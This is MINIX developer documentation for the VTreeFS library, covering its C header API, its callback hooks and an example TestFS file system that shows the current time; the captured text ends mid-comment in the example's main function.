CC-MAIN-2021-39
refinedweb
731
59.74
Java Native Access and Eclipse Indigo Swing GUI editor Normally for native access, I would use JNI to run native code, especially code I've written which interfaces with Java components. However, often you just want to call native functions (particularly system calls). Rather than having to go through the whole JNI process (which is rather painstakingly slow), someone has created the JNA library which allows you to basically call native methods directly. As far as I understand, there are two main ways to use JNA: 1. Create an interface which extends the JNA Library class, then load the appropriate native library with that interface template. 2. Declare native methods in your class. Then register that class with a native library. This is also known as "Native Mapping". Both methods have their uses, at this moment I'm not entirely sure what the difference between the two are other than semantics. I have read a few sites (particularly the old Java.net site for the JNA project) saying that native mapping has some performance benefits over using an interface, but I haven't investigate if this is true or not. So for fun, I decided to both play with the new Window Designer in Eclipse Indigo and JNA. Getting setup All you need to get started with JNA is the JNA jar file. It contains all the necessary native libraries packed in it to run on virtually any platform. The main JNA website: JNA on GitHub Note: There is a java.net website which is supposedly the home of JNA, that is the old home (a shame since it's the first item which comes up on a google search). It will probably re-direct you to the new home on GitHub. Here's a direct link to the JNA.jar file: JNA.jar download link The second file is the Javadoc for JNA: doc.zip download link To make life easier for me, I created an Eclipse User Library (see JavaTip Dec 18, 2010: Eclipse User Libraries for how to do this). So now I have a project with the JNA user library added to the build path. First thing, I create a new Record class. This class runs on a separate thread and constantly polls if the state of different keys are being changed. Note: There is code found in this class which is Windows-Specific. Honestly, I don't know what the equivalent compatible code in Linux or Mac OS would be. However, if someone figures it out, I would like to know. package record; import javax.swing.JTextArea; import com.sun.jna.Native; public class Record implements Runnable { static { Native.register("User32"); } public static native short GetKeyState(int KeyState); private boolean[] keyPresses; private long delay; private boolean keepRunning; private boolean paused; private JTextArea textArea; public Record(JTextArea textArea, long delay) { this.delay = delay; keyPresses = new boolean[256]; keepRunning = true; this.textArea = textArea; paused = false; } public void setDelay(long delay) { this.delay = delay; } public long getDelay() { return delay; } public void signalStop() { textArea.append("stopped\r\n"); keepRunning = false; } public void signalPause() { textArea.append("pause\r\n"); paused = true; } public void signalResume() { paused = false; textArea.append("resume\r\n"); synchronized (this) { notify(); } } @Override public void run() { try { long startTime = System.currentTimeMillis(); long currentTime; while (keepRunning) { if (paused) { synchronized (this) { wait(); } } Thread.sleep(delay); for (int i = 0; i < keyPresses.length; ++i) { boolean key = (Record.GetKeyState(i) & 0x8000) != 0; currentTime = System.currentTimeMillis(); if (key != keyPresses[i]) { textArea.append(currentTime - startTime + "\t" + i + "\t" + key + "\r\n"); keyPresses[i] = key; } } } } catch (InterruptedException e) { } } } For those are use to JNI, you'll immediately notice some differences, particularly with loading libraries. static { Native.register("User32"); } Native is a class of the JNA library which allows you to directly map a class's native methods to the respective native library. This is similar to System.LoadLibrary(), but here you'll notice that I'm directly linking the Windows library rather than creating a "middle-man" library (in this case, User32.dll). There is another way to load native libraries with JNA, and that's using interfaces. import com.sun.jna.Library; public interface User32Lib extends Library { short GetKeyState(int KeyState); } Now, to actually load the native library: User32Lib userLibInstance = (User32Lib) Native.loadLibrary("User32", User32Lib.class); Typically, you'd want to load this as a static field of the User32Lib interface so it's easy to find where the opened instance can be found at. import com.sun.jna.Library; public interface User32Lib extends Library { public static final User32Lib INSTANCE = (User32Lib) Native.loadLibrary("User32", User32Lib.class); // technically public and static are redundant, but I put them here just to be verbose short GetKeyState(int KeyState); } The GUI So now that I have the logic setup, it's time for the GUI. The GUI is a simple JFrame with a JTextArea and 3 JButtons. The JTextArea is surrounded by a JScrollPane. First things first: Click on "new->other...", then go down to the "WindowBuilder->Swing Designer" folder and select "JFrame". Click next, and type in the name for your JFrame class. I called mine RecordActions, and placed it in the "gui" package. I also left the "Use Advanced Template for generate JFrame" checked. First thing you may notice when the file gets created is that there are two little tabs at the bottom, one for "source" and the other for "design". Shown below is the design tab. For the most part, you can add items to the GUI in one of two ways: 1. Click on the component you want to add. 2a. Hover over a part of the "mock-up" GUI and the GUI will highlight where the item will be added in conformance with the current LayoutManager of the component. --OR-- 2b. Go over to the "Components" screen on the top left side. You can add it as a child of a component by clicking on it, or as a sibling by clicking between components. If you select a component (either in the Mock-up GUI or in the tree display), the properties tab will populate with properties that you can edit. If the property you're looking for isn't there, you can also turn on "Show Advance Properties" by right-clicking on properties tab and enabling that option. The Window Builder also allows you to easily add event listeners. These are added in the form of Anonymous classes. To add an action listener to the buttons, right-click on one, then go to "Add Event Handler"->"action"->"actionPerformed". That should take you over to the source tab, where you can edit the event handler code. Here's the finished GUI code: package gui; import java.awt.BorderLayout; public class RecordActions extends JFrame implements WindowListener { /** * */ private static final long serialVersionUID = -2123765083016662420L; private JPanel contentPane; private Record record; private JTextArea textArea; private JButton btnResume; private JButton btnPause; private JButton btnStop; /** * Launch the application. */ public static void main(String[] args) { EventQueue.invokeLater(new Runnable() { @Override public void run() { try { RecordActions frame = new RecordActions(); frame.setVisible(true); } catch (Exception e) { e.printStackTrace(); } } }); } /** * Create the frame. */ public RecordActions() { addWindowListener(this); setDefaultCloseOperation(WindowConstants.DISPOSE_ON_CLOSE); setBounds(100, 100, 450, 300); contentPane = new JPanel(); contentPane.setBorder(new EmptyBorder(5, 5, 5, 5)); contentPane.setLayout(new BorderLayout(0, 0)); setContentPane(contentPane); textArea = new JTextArea(); textArea.setEditable(false); contentPane.add(new JScrollPane(textArea), BorderLayout.CENTER); record = new Record(textArea, 50); Thread t = new Thread(record); t.start(); JPanel panel = new JPanel(); contentPane.add(panel, BorderLayout.SOUTH); panel.setLayout(new GridLayout(1, 0, 0, 0)); btnResume = new JButton("Resume"); btnResume.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { record.signalResume(); } }); panel.add(btnResume); btnPause = new JButton("Pause"); btnPause.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { record.signalPause(); } }); panel.add(btnPause); btnStop = new JButton("Stop"); btnStop.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { record.signalStop(); } }); panel.add(btnStop); } @Override public void windowActivated(WindowEvent e) { } @Override public void windowClosed(WindowEvent e) { record.signalStop(); } @Override public void windowClosing(WindowEvent e) { } @Override public void windowDeactivated(WindowEvent e) { } @Override public void windowDeiconified(WindowEvent e) { } @Override public void windowIconified(WindowEvent e) { } @Override public void windowOpened(WindowEvent e) { } public JTextArea getTextArea() { return textArea; } } For the most part, you can edit the bare Java code safely even when the Window Builder is open. For example, in my code above I manually added that the RecordActions class implements the WindowListener interface. I also added code which interfaces the logic found in the Record class with my RecordActions GUI. Anyways, I hope you found this blog useful. I'm looking forward to building more GUI's with the new designer, as well as playing more with JNA. Happy Coding
https://www.javaprogrammingforums.com/blogs/helloworld922/21-java-native-access-eclipse-indigo-swing-gui-editor.html
CC-MAIN-2019-47
refinedweb
1,442
57.87
How to write to file in C# File output can be used by C# programs to communicate with other programs written in different programming languages, or with human beings. This post documents my experiences in writing to files in C#.net. Specifying file access For file writes, we must use either the Write or the ReadWrite member of the System.IO.FileAccess enumeration to specify write access. Specifying file mode Apart from specifying file access, we specify the file mode via one of the members of the System.IO.FileMode enumeration. The file mode determines how the operating system will open the file for our code to write to. Getting an instance of System.IO.FileStream As with file creation, there are a few ways gain code access to a file which we intend to write data: - Using the System.IO.FileStreamconstructors. FileStream fileStream = new FileStream("techcoil.txt", FileMode.Append, FileAccess.Write); - Using the static Openmethod of System.IO.Fileclass. FileStream fileStream = File.open("techcoil.txt", FileMode.Append, FileAccess.Write); - Using the Openmethod of the System.IO.FileInfoclass. FileInfo fileInfo = new FileInfo("techcoil.txt"); FileStream fileStream = fileInfo.Open(FileMode.Append, FileAccess.Write); The above code segments get the operating system to open techcoil.txt for writing to the end of the file. If techcoil.txt does not exist, the operating system will create it. Writing text data to file To write text data to the file directly, we can encapsulate it in a System.IO.StreamWriter instance and use the Write or WriteLine method to write text data to the file. The following example writes the current date time to the end of techcoil.txt. using System; using System.IO; using System.Text; public class WriteTextToFile { public static void Main(string[] args) { try { // If techcoil.txt exists, seek to the end of the file, // else create a new one. FileStream fileStream = File.Open("techcoil.txt", FileMode.Append, FileAccess.Write); // Encapsulate the filestream object in a StreamWriter instance. StreamWriter fileWriter = new StreamWriter(fileStream); // Write the current date time to the file fileWriter.WriteLine(System.DateTime.Now.ToString()); fileWriter.Flush(); fileWriter.Close(); } catch (IOException ioe) { Console.WriteLine(ioe); } } } Writing binary data to file To write binary data to file, we can use the Write method of the FileStream instance. As with the previous example, the following code writes the current date time string to the end of techcoil.txt. However, it converts the current date time string as bytes before writing to techcoil.txt. public class WriteBinaryToFile { public static void Main(string[] args) { try { // If techcoil.txt exists, seek to the end of the file, // else create a new one. FileInfo fileInfo = new FileInfo("techcoil.txt"); FileStream fileStream = fileInfo.Open(FileMode.Append, FileAccess.Write); // Get the current date time as a string and add a new line to // the end of the string String currentDateTimeString = System.DateTime.Now.ToString() + Environment.NewLine; // Get the current date time string as bytes byte[] currentDateTimeStringInBytes = ASCIIEncoding.UTF8.GetBytes(currentDateTimeString); // Write those bytes to the techcoil.txt fileStream.Write(currentDateTimeStringInBytes, 0, currentDateTimeStringInBytes.Length); fileStream.Flush(); fileStream.Close(); } catch (IOException ioe) { Console.WriteLine(ioe); } // end try-catch } // end public static void Main(string[] args) } // end public class WriteBinaryToFile
https://www.techcoil.com/blog/how-to-write-to-file-in-c/
CC-MAIN-2022-40
refinedweb
530
60.31
Managing Dependencies Edit Page As you're developing your Ember app, you'll likely run into common scenarios that aren't addressed by Ember itself, such as authentication or using SASS for your stylesheets. Ember CLI provides a common format called Ember Addons for distributing reusable libraries to solve these problems. Additionally, you may want to make use of front-end dependencies like a CSS framework or a JavaScript datepicker that aren't specific to Ember apps. Ember CLI supports installing these packages through the standard Bower package manager. Addons Ember Addons can be installed using Ember CLI (e.g. ember install ember-cli-sass). Addons may bring in other dependencies by modifying your project's bower.json file automatically. You can find listings of addons on Ember Observer. Bower Ember CLI uses the Bower package manager, making it easy to keep your front-end dependencies up to date. The Bower configuration file, bower.json, is located at the root of your Ember CLI project, and lists the dependencies for your project. Executing bower install will install all of the dependencies listed in bower.json in one step. Ember CLI watches bower.json for changes. Thus it reloads your app if you install new dependencies via bower install <dependencies> --save. Other assets Third-party JavaScript not available as an addon or Bower package should be placed in the vendor/ folder in your project. Your own assets (such as robots.txt, favicon, custom fonts, etc) should be placed in the public/ folder in your project. Compiling Assets When you're using dependencies that are not included in an addon, you will have to instruct Ember CLI to include your assets in the build. This is done using the asset manifest file ember-cli-build.js. You should only try to import assets located in the bower_components and vendor folders. Globals provided by Javascript assets The globals provided by some assets (like moment in the below example) can be used in your application without the need to import them. Provide the asset path as the first and only argument. You will need to add "moment" to the predef section in .jshintrc to prevent JSHint errors AMD Javascript modules Provide the asset path as the first argument, and the list of modules and exports as the second. You can now import them in your app. (e.g. import { raw as icAjaxRaw } from 'ic-ajax';) Environment Specific Assets If you need to use different assets in different environments, specify an object as the first parameter. That object's key should be the environment name, and the value should be the asset to use in that environment. If you need to import an asset in only one environment you can wrap app.import in an if statement. For assets needed during testing, you should also use the {type: 'test'} option to make sure they are available in test mode. CSS Provide the asset path as the first argument: All style assets added this way will be concatenated and output as /assets/vendor.css. Other Assets All assets located in the public/ folder will be copied as is to the final output directory, dist/. For example, a favicon located at public/images/favicon.ico will be copied to dist/images/favicon.ico. All third-party assets, included either manually in vendor/ or via a package manager like Bower, must be added via import(). Third-party assets that are not added via import() will not be present in the final build. By default, imported assets will be copied to dist/ as they are, with the existing directory structure maintained. This example would create the font file in dist/font-awesome/fonts/fontawesome-webfont.ttf. You can also optionally tell import() to place the file at a different path. The following example will copy the file to dist/assets/fontawesome-webfont.ttf. If you need to load certain dependencies before others, you can set the prepend property equal to true on the second argument of import(). This will prepend the dependency to the vendor file instead of appending it, which is the default behavior.
https://guides.emberjs.com/v2.9.0/addons-and-dependencies/managing-dependencies/
CC-MAIN-2017-13
refinedweb
686
56.96
timer in c net example is a timer in c net document that shows the process of designing timer in c net format. A well designed timer in c net example can help design timer in c net example with unified style and layout. timer in c net example basics When designing timer in c net document, it is important to use style settings and tools. Microsoft Office provide a powerful style tool to help you manage your timer in c net timer in c net styles may help you quickly set timer in c net titles, timer in c net subheadings, timer in c net section headings apart from one another by giving them unique fonts, font characteristics, and sizes. By grouping these characteristics into styles, you can create timer in c net documents that have a consistent look without having to manually format each section header. Instead you set the style and you can control every heading set as that style from central location. you also need to consider different variations: visual basic timer example, visual basic timer example word, c system threading timer example, c system threading timer example word, c timer example reset, c timer example reset word, java timer example, java timer example word Microsoft Office also has many predefined styles you can use. you can apply Microsoft Word styles to any text in the timer in c net timer in c net documents, You can also make the styles your own by changing how they look in Microsoft Word. During the process of timer in c net style design, it is important to consider different variations, for example, c timer example console, c timer example console word, c timer example stopwatch, c timer example stopwatch word, countdown timer c example, countdown timer c example word, c sharp timer example, c sharp timer example word. timer in c net example timer class system timers to dispose of it indirectly, use a language construct such as using in c or timers class example static void main timer timer new timer timer. c how do you add a timer to a c console application. what is in this example, it would be acceptable for the method to fire every . . c timer tutorial this c tutorial covers the timer type from the system.timers this example is a static class, meaning it cannot have instance members or fields. it includes the working with a timer in c the basics listing . timer.cs displaying the time. timer .cs displaying date and time not a great way to do the time. press ctrl c to end c timer control c timer property. timer example. in the following program we display the current time in a label control. in order to develop this program, we need a timer c tutorial 9 csharp timer control within a winform span class f span class nobr span class nobr min span class nobr uploaded by bahot c tutorial csharp timer control within a winform visual studio winform windows c timer this article demonstrates how to use a timer in a windows forms for example , if you have a listbox control on a form and you want to add timer in c an article with sample project explains how to work with the timer control in c and .net to write to a text file after few seconds. c c system.timers.timer example emoticode. timers public class program private static system.timers.timer testtimer public static void main string c c working with timers posted in c tutorials hello everyone. today well be going over timers in c , i hope you enjoy this tutorial.
http://www.slipbay.com/timer-in-c-net-example/
CC-MAIN-2017-17
refinedweb
610
56.39
Important: Please read the Qt Code of Conduct - Button Text not readable As the title says the button text is not visible at all . When i click on it then only i am able to see it for a second . Screenshot : Code : import QtQuick 2.6 import QtQuick.Controls 2.0 import QtQuick.Dialogs 1.2 Item { id: root width: 580 height: 400 SystemPalette { id: palette } clip: true MessageDialog { id: quitDialog text: "Do you wish to quit?" visible: false icon : StandardIcon.Question modality: Qt.ApplicationModal standardButtons: StandardButton.Yes | StandardButton.No onAccepted: Qt.quit() Component.onCompleted: visible = true onYes : Qt.quit(); onNo: console.log("Not quitting") } } Any ideas why this is happening ? - Pradeep Kumar last edited by Hi , Just tried ur code, the text is visible for me when i ran it. i tried with Qt 5.8 , Qt 5.9 Windows. Can u list ur configuration?. Thanks, @Pradeep-Kumar Hey , the thing is my system has dark theme ( i am using KDE ) but when i switch the theme to light theme , it shows text . I am not really sure why this is happening My system if it helps : Linux mint 18 KDE . Qt 5.9 . - Pradeep Kumar last edited by Pradeep Kumar Hmmm k , didnt try with linux and the other themed settings, make be native look and feel i suppose. Will try with ur configuration some time. Thanks, still i don't understand why this behaviour :/ . does it automatically takes system theme and set colors accordingly - Pradeep Kumar last edited by need to check Qt classes for system settings and native look and feel, and of adopting those changes for App. Thanks,
https://forum.qt.io/topic/84342/button-text-not-readable
CC-MAIN-2020-34
refinedweb
273
68.77
Code Focused ASP.NET Web API allows you to write a service once and provide different output formats with little effort on the developer's side. ASP.NET Web API is a new framework technology from Microsoft, due for release with the .NET Framework 4.5. It allows a single Web service to communicate with multiple clients in various formats such as XML, JSON and OData. IT organizations are looking to expose their functionality to a variety of clients. Although many protocols exist for communicating data on the Internet, HTTP seems to be dominating due to its ease of use and wide acceptance. ASP.NET Web API. Useful features in ASP.NET Web API are listed below: History of ASP.NET Web APIThis new technology first emerged in October 2010 at the Microsoft Professional Developers Conference (PDC) with the release of Preview 1. At the time, it was called "WCF Web API." Since then the product has continued to evolve. Preview 6, released in November 2011, is the latest version. Shortly after the release of Preview 6, Microsoft announced the new name of ASP.NET Web API. The project is a joint effort between the WCF and ASP.NET teams to create an integrated Web API framework. ASP.NET Web API is available as a NuGet package for ASP.NET MVC 3, ASP.NET MVC 4 beta or ASP.NET applications. It can be installed in a variety of ways: Unfortunately, Silverlight applications aren't supported at this time. However, HTTP resources can be consumed in Silverlight using HttpWebRequest. The WCF Web API and WCF support for jQuery content on the CodePlex site is ending and will be removed by the end of 2012. Creating an HTTP ServiceTo demonstrate the powerful capabilities of ASP.NET Web API, I'll do a code walk-through. Let's assume I own a used car dealership and want to display my inventory to potential customers with various platforms (mobile, PC) or trading partners (wholesale dealers or distributors) using back-end services. I'm going to create a service that will report all vehicles on-hand, and later allow the results to be queried and filtered. First, I'll create an ASP.NET MVC 3 solution called WebAPIDemo, as shown in Figure 1. I want to start with an empty project, so I'll select the Empty template and click OK, as shown in Figure 2. Next, I'll retrieve the latest NuGet Package, via Package Manager in Visual Studio. I'll right-click on the solution in Solution Explorer, select Manage NuGet Packages and then enter WebApi.All in the search box. This retrieves the latest version of the package as shown in Figure 3. In this case, I have WebApi.All already installed so a green checkmark appears next to it. If it wasn't installed, an install button would be in place of the green checkmark. Clicking the install button next to WebApi.All in the center pane will start the installation. Accepting the necessary license agreements (see Figure 4) will continue the installation until completion, as shown in Figure 5. At this point, the project has all the necessary references in place to start coding. Figure 6 shows a view of Solution Explorer with the default files provided from the selected template. Next, I'll create a folder in the project and call it InventoryWebAPIs. I'll add a class to this folder and call it InventoryAPI.vb, as shown in Figure 7. The next step is to decorate the class with the <ServicesContract()> attribute. This will also require importing the namespace System.ServiceModel. The <ServicesContract()> indicates to the ASP.NET Web API framework that this class will be exposed over HTTP. When finished, the class code will look similar to the following: Imports System.ServiceModelNamespace Inventory.APIs <ServiceContract()> Public Class InventoryAPI End ClassEnd Namespace Now, the ASP.NET Web API needs to be hosted, which requires registering it as an ASP.NET route using ServiceRoute method. This is done in the global.asax.vb file by adding the following code to the RegisterRoutes method: routes.Add(New ServiceRoute("InventoryWebAPIs/Inventory", New HttpServiceHostFactory(), GetType(InventoryAPI))) The complete code is shown in Listing 1. Create a Resources folder in the project with a new InventoryDTO class within it. This Resources folder will hold the Data Transfer Object (DTO) to be passed to and from the ASP.NET Web API. The next step is to specify the "Start Action" for the project in the project properties. Because this is an ASP.NET MVC project, I'll specify the name of the class previously set up with the <ServiceContract()> attribute, class "Inventory." Please note, this class is in folder InventoryWebAPIs, so it also needs to be specified for "Specific Page," as shown in Figure 8. If the class "InventoryWebAPIs/Inventory" isn't specified and the project is started, an HTTP 404 error will result. If the settings in my project are correct, I can start debugging my project and it will immediately render an XML form of the data, as shown in Figure 9. Using the Built-In Test ClientNow that everything is working correctly, the next step is to use the built-in ASP.NET WCF test pages for fully testing the ASP.NET Web API. First, add Imports Microsoft.ApplicationServer.Http to global.asax.vb. Second, add an HttpConfiguration object and instantiate it: EnableTestClient = True After making the necessary coding changes, I will start debugging the application by pressing F5. When the initial page loads, it will look similar to Figure 9. However, if I append "/test" to the URL, it displays the built-in test client, as shown in Figure 10. The test client page contains four sections: To use the test client, click the Resources link in the left pane. This will populate the "Request" section with verb, URI and content header. Clicking the Send button will result in the output seen in Figure 11. The advantage of the test client is it expedites sending different content headers and verbs to the server. These are available in lists that appear when editing either the verb or the header, as shown in Figure 12. This allows the data to be sent in XML, JSON, plain text or any other format listed. Once the content header changes, ASP.NET Web API immediately adjusts to send the proper formatted output to the client. Enabling OData Query Support Another advantage of ASP.NET Web API is the ability to provide OData query support. Currently, only a subset of the query URI formats are accepted ($top, $skip, $orderby and $filter). To modify the existing API for OData support, simply change it to return an IQueryable type. This will also require using the System.Linq namespace. A complete listing of the modified code is shown in Listing 3. After making the necessary changes, the project is now ready to provide OData query support. Once the browser page loads, append the query string "?$top=2&$orderby=Model" to the address, click Send, and the modified query will be returned as shown in Figure 13. Advantages of ASP.NET Web APIASP.NET Web API is not fully released yet, but it still offers many promising features. It allows the ability to write a service once and provide many different output formats with little effort on the developer’s side. This capability is made available in ASP.NET MVC 3, ASP.NET MVC 4 beta and standard ASP.NET applications. In addition, it offers a built-in test client to facilitate testing and viewing the data passed to and from the client. Printable Format > More TechLibrary I agree to this site's Privacy Policy. > More Webcasts
http://visualstudiomagazine.com/articles/2012/06/13/creating-an-http-service-with-web-api.aspx
CC-MAIN-2015-11
refinedweb
1,288
59.19
I've also got this working in 32/24/16 and 8 bit colour modes. The multi-byte colour modes are relatively straight forward; 32 bpp is 10 bits each BGR with the top 2 bits (I assume) being used for alpha or something. 24 bpp is 8 bits each BGR, and 16 bpp is 5 bits each RGB with bit 0 ignored. The one thing that was puzzling me though was the 8 bit colour mode. It didn't seem to fall into any discernible pattern of RGB. Following some experimentation I found that white was represented by the value 0xD7 (215). Huh? After some more experimenting and searching the 'net I discovered that the 8 bit colour palette is 216-colours, which are also web-safe colours! This article confirmed my suspicions and inspired me to write the following function: - Code: Select all #define STANDARD_PALETTE_VAL_DIFF 51 unsigned int get_8bit_colour_index(unsigned int colour_24bit) { const unsigned char standard_palette[] = { 0x00, 0x33, 0x66, 0x99, 0xCC, 0xFF }; unsigned char result[3] = { 0x00, 0x00, 0x00 }; for (int i = 0; i < 3; i++) { unsigned char c = colour_24bit & 0x000000FF; int pos = c / STANDARD_PALETTE_VAL_DIFF; if (c % STANDARD_PALETTE_VAL_DIFF != 0) { if (abs(c - standard_palette[pos]) > abs(c - standard_palette[pos + 1])) { pos += 1; } } result[i] = pos; colour_24bit = (colour_24bit >> 8); } return (result[0] * 36) + (result[1] * 6) + result[2]; } What this does is take a standard 24 bit colour number (in BGR remember) and finds it's nearest colour in the 216-colour palette, returning the index position of the colour. Of course by this point you're probably wondering why you'd use 8 bit colour. Well, it's easy - 1 byte per pixel and, it's fast. Perfect if you're planning on writing arcade style games I'll be sharing my framebuffer and graphics code soon, just pm me if you'd like to get your hands on it now. V.
http://www.raspberrypi.org/phpBB3/viewtopic.php?f=72&p=221576
CC-MAIN-2014-10
refinedweb
313
64.14
The VTreeFS library provides a common base that allows the rapid development of read-only, in-memory, hierarchical file systems. Originally designed to form the basis of both DevFS and ProcFS (still ongoing efforts), it is both flexible and easy to use. The library provides the following functionality: In essence, constructing a file system using VTreeFS consists of little more than implementing the appropriate callback hooks, and starting VTreeFS from the file system's main() function. Applications wishing to use VTreeFS, must include the library's public header file, <minix/vtreefs.h>. They must link against the vtreefs library and the sys library, and in that order (“ -lvtreefs -lsys”), because VTreeFS uses functionality from syslib. An application that uses the library, can add and remove directories and other files. All files (including directories) are represented using the primary object of the library: the inode. The library essentially manages a fully connected tree of inodes. API calls are provided to navigate the tree, and retrieve and manipulate inode properties. The inode object itself is opaque to the application. Hard links are not supported, so every inode except the root inode is also an entry into its parent directory. The entry is identified in that directory by name. The names are bounded in length to save memory. VTreeFS is set up to be fairly “memory conscious” in general: the number of inodes to allocate has to be specified at start-up time by the application, and this set of inodes will be preallocated. It is not possible to create more inodes than this number. As a result, no dynamic memory allocation takes place once VTreeFS has finished initializing. To satisfy the requirements of ProcFS, an inode may also have an index associated with the entry into the directory. This optional index determines the inode's position when getting returned by a getdents() call. This allows the application to guarantee that certain directory entries will show up in getdents() output exactly once, even if these entries are deleted and readded between getdents() calls. Indexed inodes have another property: if VTreeFS runs out of inodes, it will first try to delete unused indexed entries. Applications that used indexed entries are expected to recreate any needed indexed entries from its callback functions. This allows ProcFS to expose a dynamically generated tree that when fully expanded would by far exceed the number of preallocated inodes, while still being able to provide accurate views of any parts of this tree to the callers. Since indexed entries are very specific to ProcFS, further explanation on this subject is left out of this document. A typical file system will have no use for indexed entries, and simply specify NO_INDEX and zero indexed entries in inode creation calls. For reference, the VTreeFS header file is reproduced in its entirety here. #ifndef _MINIX_VTREEFS_H #define _MINIX_VTREEFS_H struct inode; typedef int index_t; typedef void *cbdata_t; #define NO_INDEX ((index_t) -1) /* Maximum file name length, excluding terminating null character. It is set * to a low value to limit memory usage, but can be changed to any value. */ #define PNAME_MAX 24 struct inode_stat { mode_t mode; /* file mode (type and permissions) */ uid_t uid; /* user ID */ gid_t gid; /* group ID */ off_t size; /* file size */ dev_t dev; /* device number (for char/block type files) */ }; struct fs_hooks { void (*init_hook)(void); void (*cleanup_hook)(void); max, cbdata_t cbdata); int (*message_hook)(message *m); }; extern struct inode *add_inode(struct inode *parent, char *name, index_t index, struct inode_stat *stat, index_t nr_indexed_entries, cbdata_t cbdata); extern void delete_inode(struct inode *inode); extern struct inode *get_inode_by_name(struct inode *parent, char *name); extern struct inode *get_inode_by_index(struct inode *parent, index_t index); extern char const *get_inode_name(struct inode *inode); extern index_t get_inode_index(struct inode *inode); extern cbdata_t get_inode_cbdata(struct inode *inode); extern struct inode *get_root_inode(void); extern struct inode *get_parent_inode(struct inode *inode); extern struct inode *get_first_inode(struct inode *parent); extern struct inode *get_next_inode(struct inode *previous); extern void get_inode_stat(struct inode *inode, struct inode_stat *stat); extern void set_inode_stat(struct inode *inode, struct inode_stat *stat); extern void start_vtreefs(struct fs_hooks *hooks, unsigned int nr_inodes, struct inode_stat *stat, index_t nr_indexed_entries); #endif /* _MINIX_VTREEFS_H */ add_inode adds an inode into a parent inode (which must be a directory), with the given name - a string that must consist of no more than PNAME_MAX characters. If the index parameter is not equal to NO_INDEX, it indicates the index position for the inode in the parent directory. The stat parameter points to a filled structure of inode metadata. This structure's mode field determines the file type and the access permissions (see /usr/include/sys/stat.h); directories (S_IFDIR), regular files (S_IFREG), character-special files (S_IFCHR), block-special files (S_IFBLK), and symbolic links (S_IFLNK) are supported. The uid, gid, size and dev fields specify the owning user and group ID, the size of the inode, and the device number (for block and character special files), respectively. The nr_indexed_entries parameter is only used for new directories (S_IFDIR), and indicates the range (0 to nr_indexed_entries-1) reserved for inodes with index numbers; this value may be 0. The actual deletion may be deferred if the inode is still open. It will then automatically be removed once it is closed, and no callback functions will be called on it in the meantime.. Note that the file type of the inode must not be changed after creation. start_vtreefs starts the main loop of the vtree file system library, accepting requests from VFS and possibly other sources (passing those on to the application), and making the appropriate callbacks to the application based on the hooks given by the application. Due to limitations of the SEF framework, this API call never returns; when VTreeFS is instructed to shut down, it will exit by itself. The hooks parameter specifies a structure of function pointers; see the next section for details. The nr_inodes parameter specifies the maximum number of inodes, which will also be preallocated at startup. Upon being started, the vtreefs library has to create a root inode; the stat and nr_indexed_entries parameters of start_vtreefs() determine the initial parameters of this root inode. The fs_hooks structure that must be provided to the start_vtreefs call, contains the following hook function pointers. init_hook is called when the file system is mounted. At this point, VTreeFS has initialized itself, and it is possible to add inodes to the tree. cleanup_hook is called when the file system is unmounted. The application should use this function to perform any cleanup it wants to do itself, because this is always the last hook call before the entire process exits. allows the application to do for example the following things safely: In the latter case, the hook implementation should return an error (typically ENOENT) to indicate that the lookup function should not continue; this is the error that will be returned to VFS. If OK is returned from the lookup function, the library continues the lookup. getdents_hook is called every time. As a sidenote, while returning a pointer to the data may seem strange, this construction avoids the extra overhead of size max. The hook implementation can write a path name string of up to max bytes into ptr, including the terminating '\0' character. message_hook is called whenever the library's main loop receives a message that is an unsupported request from VFS, or a request not from VFS. The message parameter points to the message received. If the message was from VFS, the return value from the hook function will be used instead of ENOSYS when replying to VFS. If the message was not from VFS, it is fully up to the hook implementer to decide what to do with the message; the library will not send a reply by itself in this case. All hook pointers given in the fs_hooks structure may be NULL, in which case sensible defaults will be used. If a file system is mounted and unmounted more than once during its process lifetime (as is the case for ProcFS, for example), the init_hook and cleanup_hook hooks may be called more than once as well. The constructed tree is not destroyed at unmount time, so the init hook should be careful not to recreate nodes that already exist. This behavior is not ideal and may be changed later. Below is a very simple TestFS file system that makes use of VTreeFS to expose a single file called “test” which contains a textual representation of the current time. TestFS consists of two files, Makefile and testfs.c, which must both be placed in the same directory. We start with the Makefile: # Makefile for TestFS server PROG= testfs SRCS= testfs.c DPADD+= ${LIBVTREEFS} ${LIBSYS} LDADD+= -lvtreefs -lsys MAN= BINDIR?= /sbin .include <bsd.prog.mk> Then testfs.c: #include <minix/drivers.h> #include <minix/vtreefs.h> #include <sys/stat.h> #include <time.h> #include <assert.h> static void my_init_hook(void) { /* This hook will be called once, after VTreeFS has initialized. */ struct inode_stat file_stat; struct inode *inode; /* We create one regular file in the root directory. The file is * readable by everyone, and owned by root. Its size as returned by for * example stat() will be zero, but that does not mean it is empty. * For files with dynamically generated content, the file size is * typically set to zero. */ file_stat.mode = S_IFREG | 0444; file_stat.uid = 0; file_stat.gid = 0; file_stat.size = 0; file_stat.dev = NO_DEV; /* Now create the actual file. It is called "test" and does not have an * index number. Its callback data value is set to 1, allowing it to be * identified with this number later. */ inode = add_inode(get_root_inode(), "test", NO_INDEX, &file_stat, 0, (cbdata_t) 1); assert(inode != NULL); } static int my_read_hook(struct inode *inode, off_t offset, char **ptr, size_t *len, cbdata_t cbdata) { /* This hook will be called every time a regular file is read. We use * it to dyanmically generate the contents of our file. */ static char data[26]; const char *str; time_t now; /* We have only a single file. With more files, cbdata may help * distinguishing between them. */ assert((int) cbdata == 1); /* Generate the contents of the file into the 'data' buffer. We could * use the return value of ctime() directly, but that would make for a * lousy example. */ time(&now); str = ctime(&now); strcpy(data, str); /* If the offset is beyond the end of the string, return EOF. */ if (offset > strlen(data)) { *len = 0; return OK; } /* Otherwise, return a pointer into 'data'. If necessary, bound the * returned length to the length of the rest of the string. Note that * 'data' has to be static, because it will be used after this function * returns. */ *ptr = data + offset; if (*len > strlen(data) - offset) *len = strlen(data) - offset; return OK; } /* The table with callback hooks. */ struct fs_hooks my_hooks = { my_init_hook, NULL, /* cleanup_hook */ NULL, /* lookup_hook */ NULL, /* getdents_hook */ my_read_hook, NULL, /* rdlink_hook */ NULL /* message_hook */ }; int main(void) { struct inode_stat root_stat; /* Fill in the details to be used for the root inode. It will be a * directory, readable and searchable by anyone, and owned by root. */ root_stat.mode = S_IFDIR | 0555; root_stat.uid = 0; root_stat.gid = 0; root_stat.size = 0; root_stat.dev = NO_DEV; /* Now start 